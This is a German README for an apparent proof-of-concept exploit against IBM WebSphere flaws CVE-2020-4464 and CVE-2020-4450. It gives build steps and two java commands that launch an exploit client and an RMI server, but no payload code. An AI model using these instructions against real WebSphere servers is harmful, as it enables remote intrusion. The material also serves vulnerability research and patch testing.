
CVE-2020-4464 / CVE-2020-4450
Dies basiert auf den hervorragenden Blogbeiträgen von ZDI (ursprünglicher Bericht von @_tint0):
... und der Arbeit einiger feiner chinesischer Hacker (ich konnte die wahre Quelle des Codes nicht ermitteln, zögern Sie nicht, ein Issue zu eröffnen, wenn Sie glauben, dass Ihnen die Anerkennung gebührt):
Meine Ergänzungen (nicht viel, wirklich):
FoxGlove's code wird als Submodul eingebunden, Sie können die WebSphere-Anforderungsdatei verwenden, um CVE-2020-4464 auszulösen.
Sie sollten die Verzeichnisse plugins und runtimes von WebSphere in das Verzeichnis lib kopieren und dann ausführen, um zu kompilieren!
antZum Ausführen (Java 11):
java -cp .:runtimes/com.ibm.ws.orb_9.0.jar:runtimes/com.ibm.ws.admin.client_9.0.jar:plugins/com.ibm.ws.managedobject.jar:plugins/com.ibm.ws.runtime.jar:plugins/com.ibm.ws.batch.runtime.jar:plugins/javax.j2ee.ejb.jar:runtimes/com.ibm.jaxws.thinclient_9.0.jar --add-modules jdk.naming.rmi --add-exports='jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED' Test
java -cp .:plugins/com.ibm.ws.runtime.jar:runtimes/com.ibm.ws.admin.client_9.0.jar RMIServer